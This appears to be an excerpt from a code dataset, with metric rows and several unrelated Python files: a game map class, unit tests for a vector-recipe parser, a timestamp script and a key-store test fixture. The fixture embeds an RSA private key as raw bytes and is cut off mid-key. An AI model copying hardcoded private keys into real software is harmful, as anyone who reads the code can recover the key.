| 0.043699
| 0.039726
| 0.026264
| 0.874862
| 0.874862
| 0.868241
| 0.868241
| 0.868241
| 0.868241
| 0
| 0.011828
| 0.233306
| 7,278
| 180
| 104
| 40.433333
| 0.800179
| 0
| 0
| 0.813793
| 0
| 0
| 0.110745
| 0.05496
| 0
| 0
| 0
| 0
| 0.110345
| 1
| 0.068966
| false
| 0.013793
| 0.055172
| 0
| 0.193103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
744c73982afb7700b93319a1589e8c024c0bf543
| 198
|
py
|
Python
|
src/labster/infrastructure/repositories/inmemory/__init__.py
|
jean3108/labandco
|
4317e7d3875f10d76076ad5fc68c1ba3c12badba
|
[
"Apache-2.0"
] | 2
|
2019-11-11T22:09:58.000Z
|
2020-01-20T19:44:30.000Z
|
src/labster/infrastructure/repositories/inmemory/__init__.py
|
jean3108/labandco
|
4317e7d3875f10d76076ad5fc68c1ba3c12badba
|
[
"Apache-2.0"
] | 15
|
2020-03-31T10:58:37.000Z
|
2022-01-22T09:14:49.000Z
|
src/labster/infrastructure/repositories/inmemory/__init__.py
|
jean3108/labandco
|
4317e7d3875f10d76076ad5fc68c1ba3c12badba
|
[
"Apache-2.0"
] | 2
|
2021-05-28T12:20:24.000Z
|
2021-09-08T11:27:57.000Z
|
# from __future__ import annotations
#
# from .profile_repository import InmemoryProfileRepository
# from .structure_repository import InmemoryStructureRepository
from __future__ import annotations
| 33
| 63
| 0.868687
| 18
| 198
| 9
| 0.5
| 0.123457
| 0.197531
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10101
| 198
| 5
| 64
| 39.6
| 0.910112
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
77e052f8b073c4eb8e980c0f4fb54d4aea432c11
| 1,733
|
py
|
Python
|
old/Data/Map.py
|
emeric254/ISOT
|
51011da320eed6d9092e93e9ba4838ff84e62e86
|
[
"MIT"
] | 1
|
2015-01-13T16:23:20.000Z
|
2015-01-13T16:23:20.000Z
|
old/Data/Map.py
|
emeric254/ISOT
|
51011da320eed6d9092e93e9ba4838ff84e62e86
|
[
"MIT"
] | null | null | null |
old/Data/Map.py
|
emeric254/ISOT
|
51011da320eed6d9092e93e9ba4838ff84e62e86
|
[
"MIT"
] | null | null | null |
import Data.Utils
class Map:
    """Hard-coded isometric map: a 3-D grid (layer x row x cell) of tile images.

    A cell holds either a loaded cube tile image, ``0`` (explicitly empty
    cell), or is simply absent (short/empty rows), exactly mirroring the
    original hand-written layout.
    """

    def __init__(self):
        """Build the fixed 4-layer map, loading one cube sprite per cell."""
        def _cube():
            # One fresh load per cell (colorkey -1), matching the original
            # code which repeated this exact call for every cell.
            return Data.Utils.load_image("cube.png", -1)

        self.carte = [
            # Layer 0: solid 4x4 floor.
            [[_cube() for _ in range(4)] for _ in range(4)],
            # Layers 1-2: corner/edge cubes with a hollow middle.
            [
                [_cube(), 0, 0, _cube()],
                [],
                [],
                [_cube()]
            ],
            [
                [_cube(), 0, 0, _cube()],
                [],
                [],
                [_cube()]
            ],
            # Layer 3: one full row of cubes, then one cube per remaining row.
            [
                [_cube() for _ in range(4)],
                [_cube()],
                [_cube()],
                [_cube()]
            ]
        ]

    def __len__(self):
        """Return the number of layers in the map."""
        return len(self.carte)
| 46.837838
| 173
| 0.507213
| 226
| 1,733
| 3.725664
| 0.079646
| 0.320665
| 0.447743
| 0.619952
| 0.900238
| 0.900238
| 0.900238
| 0.900238
| 0.900238
| 0.900238
| 0
| 0.026549
| 0.282747
| 1,733
| 36
| 174
| 48.138889
| 0.650845
| 0.008656
| 0
| 0.580645
| 0
| 0
| 0.135911
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.032258
| 0.032258
| 0.16129
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
bb057347f8a3b12e9881e357c11f74ff4b9687af
| 3,014
|
py
|
Python
|
tests/utils/test_VectorRecipeParser.py
|
ankitshah009/dcase_util
|
738571ce78faf60b0fdfa1d59fd42f42c8944f3d
|
[
"MIT"
] | 122
|
2017-11-10T16:51:04.000Z
|
2022-03-28T07:04:34.000Z
|
tests/utils/test_VectorRecipeParser.py
|
gpinyero/dcase_util
|
298b2db13a2ffce7791f4de9d374616793564816
|
[
"MIT"
] | 18
|
2018-03-29T01:14:35.000Z
|
2022-03-30T11:21:17.000Z
|
tests/utils/test_VectorRecipeParser.py
|
gpinyero/dcase_util
|
298b2db13a2ffce7791f4de9d374616793564816
|
[
"MIT"
] | 39
|
2017-11-16T14:34:26.000Z
|
2022-03-27T06:27:52.000Z
|
""" Unit tests for VectorRecipeParser """
import nose.tools
from dcase_util.utils import VectorRecipeParser
def test_parse():
    """Exercise VectorRecipeParser.parse on bare-label, multi-item, range,
    selection-list, and stream-qualified recipe strings."""
    eq = nose.tools.eq_
    parser = VectorRecipeParser()

    # Test #1: a bare label parses to a single item.
    items = parser.parse(recipe='mel')
    eq(len(items), 1)
    eq(items[0]['label'], 'mel')

    # Test #2: two labels, each with a stream index.
    items = parser.parse(recipe='mel=0;mfcc=1')
    eq(len(items), 2)
    eq(items[0]['label'], 'mel')
    eq(items[1]['label'], 'mfcc')
    # Stream indices follow the recipe; full vector, no explicit selection.
    eq(items[0]['vector-index']['stream'], 0)
    eq(items[1]['vector-index']['stream'], 1)
    eq(items[0]['vector-index']['full'], True)
    eq(items[1]['vector-index']['full'], True)
    eq(items[0]['vector-index']['selection'], False)
    eq(items[1]['vector-index']['selection'], False)

    # Test #3: dimension range "1-20" yields start=1, stop=21 (exclusive stop).
    items = parser.parse(recipe='mel=1-20')
    eq(len(items), 1)
    eq(items[0]['label'], 'mel')
    eq(items[0]['vector-index']['stream'], 0)
    eq(items[0]['vector-index']['full'], False)
    eq(items[0]['vector-index']['selection'], False)
    eq(items[0]['vector-index']['start'], 1)
    eq(items[0]['vector-index']['stop'], 21)

    # Test #4: comma list becomes an explicit selection of dimensions.
    items = parser.parse(recipe='mel=1,2,4,5')
    eq(len(items), 1)
    eq(items[0]['label'], 'mel')
    eq(items[0]['vector-index']['stream'], 0)
    eq(items[0]['vector-index']['full'], False)
    eq(items[0]['vector-index']['selection'], True)
    nose.tools.assert_list_equal(items[0]['vector-index']['vector'], [1, 2, 4, 5])

    # Test #5: "stream:range" form — stream qualifier plus dimension range.
    items = parser.parse(recipe='mel=1:1-20')
    eq(len(items), 1)
    eq(items[0]['label'], 'mel')
    eq(items[0]['vector-index']['stream'], 1)
    eq(items[0]['vector-index']['full'], False)
    eq(items[0]['vector-index']['selection'], False)
    eq(items[0]['vector-index']['start'], 1)
    eq(items[0]['vector-index']['stop'], 21)
| 33.865169
| 90
| 0.668547
| 433
| 3,014
| 4.468822
| 0.120092
| 0.223256
| 0.170543
| 0.219638
| 0.842377
| 0.829974
| 0.817571
| 0.817571
| 0.810336
| 0.766408
| 0
| 0.025088
| 0.153616
| 3,014
| 88
| 91
| 34.25
| 0.733438
| 0.139681
| 0
| 0.6
| 0
| 0
| 0.176356
| 0
| 0
| 0
| 0
| 0
| 0.022222
| 1
| 0.022222
| false
| 0
| 0.044444
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bb1b6b88309bc5b257921790116928044e5cf2f8
| 68
|
py
|
Python
|
tests-example/now.py
|
saada/tilt-example-nodejs
|
a2c58ea65dd40f50903bded3f22b9fd36a91bc15
|
[
"Apache-2.0"
] | 10
|
2021-03-30T12:36:46.000Z
|
2022-01-02T22:25:40.000Z
|
tests-example/now.py
|
saada/tilt-example-nodejs
|
a2c58ea65dd40f50903bded3f22b9fd36a91bc15
|
[
"Apache-2.0"
] | 3
|
2020-08-28T17:15:49.000Z
|
2021-06-10T22:10:53.000Z
|
tests-example/now.py
|
saada/tilt-example-nodejs
|
a2c58ea65dd40f50903bded3f22b9fd36a91bc15
|
[
"Apache-2.0"
] | 8
|
2020-08-15T03:10:52.000Z
|
2021-09-15T10:53:16.000Z
|
import time

# Print the current Unix epoch time in nanoseconds as a decimal integer.
# Defect fixed: the original computed float(time.time()) * 1000 * 1000 * 1000,
# which loses sub-microsecond precision because a float cannot represent a
# nanosecond-resolution epoch exactly. time.time_ns() (Python 3.7+) returns
# the same quantity as an exact integer.
print("%d" % time.time_ns())
| 22.666667
| 55
| 0.602941
| 10
| 68
| 4.1
| 0.6
| 0.390244
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0.161765
| 68
| 3
| 55
| 22.666667
| 0.508772
| 0
| 0
| 0
| 0
| 0
| 0.028986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
bb4d8e87cff8a60a7cef20e90f630478125e1e6b
| 22,329
|
py
|
Python
|
tests/expected/RSA2048_3certs.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 92
|
2016-10-03T07:54:39.000Z
|
2022-03-29T00:38:45.000Z
|
tests/expected/RSA2048_3certs.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 46
|
2016-09-09T03:13:40.000Z
|
2022-03-10T22:54:12.000Z
|
tests/expected/RSA2048_3certs.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 30
|
2016-10-07T16:12:11.000Z
|
2022-02-04T21:34:03.000Z
|
# Expected-value test fixture: raw RSA-2048 public key bytes.
# The blob begins with a DER SEQUENCE header (0x30 0x82 ...) — presumably a
# SubjectPublicKeyInfo structure; confirm against the test that consumes it.
public_key = b"\x30\x82\x01\x22\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x00\x30\x82\x01\x0a\x02\x82\x01\x01" + \
b"\x00\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57" + \
b"\xf1\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b" + \
b"\x12\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a" + \
b"\x17\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe" + \
b"\xcc\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01" + \
b"\x38\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1" + \
b"\xaf\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9" + \
b"\x21\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca" + \
b"\x55\x02\x03\x01\x00\x01"
# Expected-value test fixture: raw RSA-2048 private key bytes.
# Begins 0x30 0x82 ... 0x02 0x01 0x00 0x02 0x82 — presumably an unwrapped
# PKCS#1 RSAPrivateKey structure; confirm against the consuming test.
raw_private_key = b"\x30\x82\x04\xa3\x02\x01\x00\x02\x82\x01\x01\x00\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd" + \
b"\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57\xf1\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae" + \
b"\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b\x12\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a" + \
b"\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a\x17\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83" + \
b"\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe\xcc\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4" + \
b"\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01\x38\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0" + \
b"\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1\xaf\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b" + \
b"\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9\x21\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d" + \
b"\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca\x55\x02\x03\x01\x00\x01\x02\x82\x01\x00\x72\xd6\xd7\x00\xdf\xef\xa6\x0e\xc9\x05\xf3" + \
b"\xdc\x20\x4a\x5c\xc8\xd4\xd6\x61\x02\x0a\x42\x23\xe4\x4e\x22\x97\x43\x86\x66\x89\x5a\x8e\xcf\x20\x47\x0e\x20\x01\x37\x3a\xa6\xd8" + \
b"\xc3\xda\xb3\x91\xdf\x62\x8e\xd9\x01\x56\x2f\x50\xc7\x22\x80\x65\x38\x42\xe9\xbe\xb4\x2a\xe7\xc9\x04\x02\x5f\x10\x77\x0b\xc9\x1d" + \
b"\x7c\x57\x07\x01\xcb\xe0\x63\x37\x06\xf5\xfa\xa8\x23\x09\x85\xf4\x4b\xed\x30\x05\x20\xc5\x51\xbf\x58\xa7\x4f\xb7\x77\xb1\x47\x9f" + \
b"\x68\xdd\xad\x69\xb1\x53\xea\x24\xa7\x99\x11\xda\x98\x39\xbd\x6b\x3f\x29\x0f\x67\xe0\x04\x6d\x58\x02\xd2\x96\xd9\x2f\x88\x40\xbe" + \
b"\x4b\x3e\x82\x81\xff\xa5\x1f\xf8\x76\x43\x8f\x31\x84\xbf\xc9\xd2\x3f\xa6\xc2\x74\x8a\x93\x61\xd1\x00\x06\x28\xee\x29\xb9\x14\x2c" + \
b"\x6f\xb3\xed\xe0\xb3\xff\x54\x5e\x0d\x7c\x91\xcb\xae\x8b\xf2\x7f\x41\x47\x72\x89\xcc\xa8\x19\x7f\x0c\x24\x76\xbd\xde\x07\x09\xff" + \
b"\x7f\xf7\xb8\x97\x7d\x76\xc1\xf4\xff\x87\xda\x0a\x57\xcc\x92\x0d\xc2\x06\x5e\xa1\xb8\x24\x84\x0a\x73\x6b\x15\xa6\x0f\xb8\x09\x5a" + \
b"\x81\x0f\x21\x50\x52\x66\xcd\x78\xab\xfa\x14\xb7\xd8\x51\x3f\xce\x46\x8a\x27\x9a\x81\x02\x81\x81\x00\xf7\xb2\x3c\x6f\x9c\xae\xa2" + \
b"\x75\x95\xbb\xae\xd2\x78\xad\xc3\xb6\x44\x18\xad\x92\x01\xc5\xdd\x6f\x33\x04\x2a\x4f\x00\xb9\x3f\x18\xf4\x39\xe3\xc7\x08\x58\xc7" + \
b"\x9f\x35\x31\x13\x56\x88\x33\xc5\x5d\xeb\x6d\x8c\xdf\x1d\x45\x8b\xdb\xf8\x09\x25\x4a\x80\x32\xec\xef\xc0\x24\x56\xf7\xd3\x2a\x6e" + \
b"\xd0\x2e\x73\x07\xb5\xb6\x37\x67\x10\x28\xfa\xfc\xb1\xef\x59\xed\xfc\x79\x4d\xd4\xa5\x4f\xb3\xf2\x15\xfb\x26\x0a\xa8\x2a\xdd\x40" + \
b"\x0d\xf6\xdb\xb4\x8b\x47\x60\xec\x4c\xa6\xe5\x15\x1f\x2b\x70\xa5\xbf\xfc\x54\xae\x9d\x91\xfd\x01\x7d\x02\x81\x81\x00\xc6\xfa\xe2" + \
b"\x22\xe6\xbb\xed\xd6\xfc\x69\x48\x83\xf0\x08\x86\x55\x58\xae\x0f\x16\xc9\xef\xb2\x4d\xc8\x5d\x4b\xc2\xa4\x05\x26\x92\x42\xce\x5b" + \
b"\x40\xa8\xd4\x26\xe9\x98\x98\x32\xe0\xd1\x60\x05\x84\xd8\x89\xd5\x42\x3e\x27\x20\x22\xdc\x2e\x6a\x1c\xb0\x88\xb2\x37\x12\x7e\x61" + \
b"\x60\x84\x60\x97\xa2\xec\x35\xe2\xfd\xf8\x6b\xf8\xae\xfc\x70\xc8\x84\xa5\x46\x63\xff\x2c\x46\x48\x61\x2b\x91\x75\x21\xd0\xf6\x02" + \
b"\x7e\xa5\xd2\x39\x06\x30\x17\xea\x1a\x7f\xb3\x57\xe2\xcc\xda\xc1\x58\x34\xee\x50\x54\xd8\x8b\x41\xc3\x4a\x4b\x43\xb9\x02\x81\x81" + \
b"\x00\xae\x6a\x6f\x6c\x18\x64\x50\x39\x84\x4a\x38\x7c\x34\x46\x07\x7e\x1c\xcd\x53\xcb\x70\x3c\x28\x04\xd9\x63\xa1\x77\x28\x07\x49" + \
b"\x8b\x04\xce\x8e\xb9\xe4\x02\xbf\xee\x37\xc2\x6a\xdf\x8f\xe1\x04\xa5\x71\xd6\x1e\x50\x2d\x88\x7f\x47\x51\x8c\xff\x19\x4a\xd4\x91" + \
b"\x4a\xf1\x7d\xa5\x4f\xb4\xfe\x38\x31\x97\xc3\xa0\x36\x30\x2d\x2b\x01\x92\x19\xca\x3e\x71\x50\x5d\xe8\x5e\x72\x93\xbe\x24\x35\x8d" + \
b"\xce\x34\x9f\x40\xf9\xd1\xd5\x21\xf9\xb3\x4e\x59\xff\x89\x2f\x92\xb5\x17\x00\x50\xb3\x36\x1f\x88\x57\x7c\x13\x15\x32\x17\x4e\x94" + \
b"\xf1\x02\x81\x80\x59\xcd\x9d\x05\xf7\x70\xd5\xb4\xf3\x92\x68\xc1\xf3\x31\x45\xbf\x7b\x18\x83\x82\xdb\x7c\xac\xd2\x62\x1d\x89\x35" + \
b"\xbd\x64\xfd\xb5\x81\x25\x35\x16\x07\x9c\x48\x3b\xa1\x3c\xff\xa9\x6b\x95\x94\xa8\x12\x3a\x92\xdf\x24\xc1\xef\xc5\x0b\xee\x7e\xc1" + \
b"\x98\x02\xf9\xbb\xd5\x42\xe8\x9b\xf0\xe2\xcf\x4d\x1e\xa2\x6b\x62\x08\x1e\x62\xcc\x46\xee\x77\xf1\x35\xce\x81\x0f\x07\x62\x69\x04" + \
b"\x41\xef\x92\x17\xc3\x01\x64\xba\xd8\x07\xfa\xe8\x8a\x08\x21\x05\xf8\xa0\x6e\x87\xd3\xc0\xdf\x05\xfa\x4d\x9c\x3f\xce\xc3\x7a\xd8" + \
b"\xb2\xcd\x29\x31\x02\x81\x80\x59\x7c\x94\xf2\x28\x9c\x8c\x24\x1c\xc3\x84\xac\xf6\x49\xf6\xc7\xb1\x98\x66\xf5\x6c\x59\x31\xe5\x30" + \
b"\xb2\xc1\xc0\xcc\x15\x94\x4d\x5a\xa0\x5c\xcb\x30\x46\xaa\xdc\x25\x60\xe2\x64\x5f\x1e\x35\xc3\x82\x3c\x47\x06\xc7\x4f\x39\xcc\x4f" + \
b"\xda\xf7\xf5\x28\x30\xde\x9a\xa3\xb9\xf6\xa4\x4a\x43\xff\x9e\x1a\x01\xcb\x03\x51\x37\xd4\xb8\xea\xab\xd5\xb6\x36\xf9\x76\x1e\x08" + \
b"\x9e\xcd\x58\x71\x8b\x6d\xa6\xf4\x43\xa3\x63\xf8\xd5\x72\xc1\x4b\x76\x78\x03\x15\x8d\xbf\xb3\x1f\x63\x3f\x99\xec\xfb\xd1\x5d\x09" + \
b"\x1d\xa6\xe6\xd0\xc6\x3c\xf9"
# Expected-value test fixture: the same RSA-2048 private key, wrapped.
# Begins with a DER SEQUENCE, version 0, and what looks like an rsaEncryption
# AlgorithmIdentifier — presumably a PKCS#8 PrivateKeyInfo wrapping
# raw_private_key above; confirm against the consuming test.
private_key = b"\x30\x82\x04\xbd\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x04\x82\x04\xa7\x30\x82\x04\xa3\x02\x01" + \
b"\x00\x02\x82\x01\x01\x00\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e" + \
b"\x4e\x0c\x30\xff\x57\xf1\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f" + \
b"\xcb\xfb\x56\x96\x1b\x12\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62" + \
b"\x23\x0f\x8b\x0a\x6a\x17\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4" + \
b"\x01\x21\x52\x51\xfe\xcc\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae" + \
b"\x9e\x21\x50\x84\x01\x38\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11" + \
b"\x0c\x81\xd2\x60\xf1\xaf\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86" + \
b"\x9c\xb9\x7f\x12\xd9\x21\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a" + \
b"\x33\xd8\x48\xd8\xca\x55\x02\x03\x01\x00\x01\x02\x82\x01\x00\x72\xd6\xd7\x00\xdf\xef\xa6\x0e\xc9\x05\xf3\xdc\x20\x4a\x5c\xc8\xd4" + \
b"\xd6\x61\x02\x0a\x42\x23\xe4\x4e\x22\x97\x43\x86\x66\x89\x5a\x8e\xcf\x20\x47\x0e\x20\x01\x37\x3a\xa6\xd8\xc3\xda\xb3\x91\xdf\x62" + \
b"\x8e\xd9\x01\x56\x2f\x50\xc7\x22\x80\x65\x38\x42\xe9\xbe\xb4\x2a\xe7\xc9\x04\x02\x5f\x10\x77\x0b\xc9\x1d\x7c\x57\x07\x01\xcb\xe0" + \
b"\x63\x37\x06\xf5\xfa\xa8\x23\x09\x85\xf4\x4b\xed\x30\x05\x20\xc5\x51\xbf\x58\xa7\x4f\xb7\x77\xb1\x47\x9f\x68\xdd\xad\x69\xb1\x53" + \
b"\xea\x24\xa7\x99\x11\xda\x98\x39\xbd\x6b\x3f\x29\x0f\x67\xe0\x04\x6d\x58\x02\xd2\x96\xd9\x2f\x88\x40\xbe\x4b\x3e\x82\x81\xff\xa5" + \
b"\x1f\xf8\x76\x43\x8f\x31\x84\xbf\xc9\xd2\x3f\xa6\xc2\x74\x8a\x93\x61\xd1\x00\x06\x28\xee\x29\xb9\x14\x2c\x6f\xb3\xed\xe0\xb3\xff" + \
b"\x54\x5e\x0d\x7c\x91\xcb\xae\x8b\xf2\x7f\x41\x47\x72\x89\xcc\xa8\x19\x7f\x0c\x24\x76\xbd\xde\x07\x09\xff\x7f\xf7\xb8\x97\x7d\x76" + \
b"\xc1\xf4\xff\x87\xda\x0a\x57\xcc\x92\x0d\xc2\x06\x5e\xa1\xb8\x24\x84\x0a\x73\x6b\x15\xa6\x0f\xb8\x09\x5a\x81\x0f\x21\x50\x52\x66" + \
b"\xcd\x78\xab\xfa\x14\xb7\xd8\x51\x3f\xce\x46\x8a\x27\x9a\x81\x02\x81\x81\x00\xf7\xb2\x3c\x6f\x9c\xae\xa2\x75\x95\xbb\xae\xd2\x78" + \
b"\xad\xc3\xb6\x44\x18\xad\x92\x01\xc5\xdd\x6f\x33\x04\x2a\x4f\x00\xb9\x3f\x18\xf4\x39\xe3\xc7\x08\x58\xc7\x9f\x35\x31\x13\x56\x88" + \
b"\x33\xc5\x5d\xeb\x6d\x8c\xdf\x1d\x45\x8b\xdb\xf8\x09\x25\x4a\x80\x32\xec\xef\xc0\x24\x56\xf7\xd3\x2a\x6e\xd0\x2e\x73\x07\xb5\xb6" + \
b"\x37\x67\x10\x28\xfa\xfc\xb1\xef\x59\xed\xfc\x79\x4d\xd4\xa5\x4f\xb3\xf2\x15\xfb\x26\x0a\xa8\x2a\xdd\x40\x0d\xf6\xdb\xb4\x8b\x47" + \
b"\x60\xec\x4c\xa6\xe5\x15\x1f\x2b\x70\xa5\xbf\xfc\x54\xae\x9d\x91\xfd\x01\x7d\x02\x81\x81\x00\xc6\xfa\xe2\x22\xe6\xbb\xed\xd6\xfc" + \
b"\x69\x48\x83\xf0\x08\x86\x55\x58\xae\x0f\x16\xc9\xef\xb2\x4d\xc8\x5d\x4b\xc2\xa4\x05\x26\x92\x42\xce\x5b\x40\xa8\xd4\x26\xe9\x98" + \
b"\x98\x32\xe0\xd1\x60\x05\x84\xd8\x89\xd5\x42\x3e\x27\x20\x22\xdc\x2e\x6a\x1c\xb0\x88\xb2\x37\x12\x7e\x61\x60\x84\x60\x97\xa2\xec" + \
b"\x35\xe2\xfd\xf8\x6b\xf8\xae\xfc\x70\xc8\x84\xa5\x46\x63\xff\x2c\x46\x48\x61\x2b\x91\x75\x21\xd0\xf6\x02\x7e\xa5\xd2\x39\x06\x30" + \
b"\x17\xea\x1a\x7f\xb3\x57\xe2\xcc\xda\xc1\x58\x34\xee\x50\x54\xd8\x8b\x41\xc3\x4a\x4b\x43\xb9\x02\x81\x81\x00\xae\x6a\x6f\x6c\x18" + \
b"\x64\x50\x39\x84\x4a\x38\x7c\x34\x46\x07\x7e\x1c\xcd\x53\xcb\x70\x3c\x28\x04\xd9\x63\xa1\x77\x28\x07\x49\x8b\x04\xce\x8e\xb9\xe4" + \
b"\x02\xbf\xee\x37\xc2\x6a\xdf\x8f\xe1\x04\xa5\x71\xd6\x1e\x50\x2d\x88\x7f\x47\x51\x8c\xff\x19\x4a\xd4\x91\x4a\xf1\x7d\xa5\x4f\xb4" + \
b"\xfe\x38\x31\x97\xc3\xa0\x36\x30\x2d\x2b\x01\x92\x19\xca\x3e\x71\x50\x5d\xe8\x5e\x72\x93\xbe\x24\x35\x8d\xce\x34\x9f\x40\xf9\xd1" + \
b"\xd5\x21\xf9\xb3\x4e\x59\xff\x89\x2f\x92\xb5\x17\x00\x50\xb3\x36\x1f\x88\x57\x7c\x13\x15\x32\x17\x4e\x94\xf1\x02\x81\x80\x59\xcd" + \
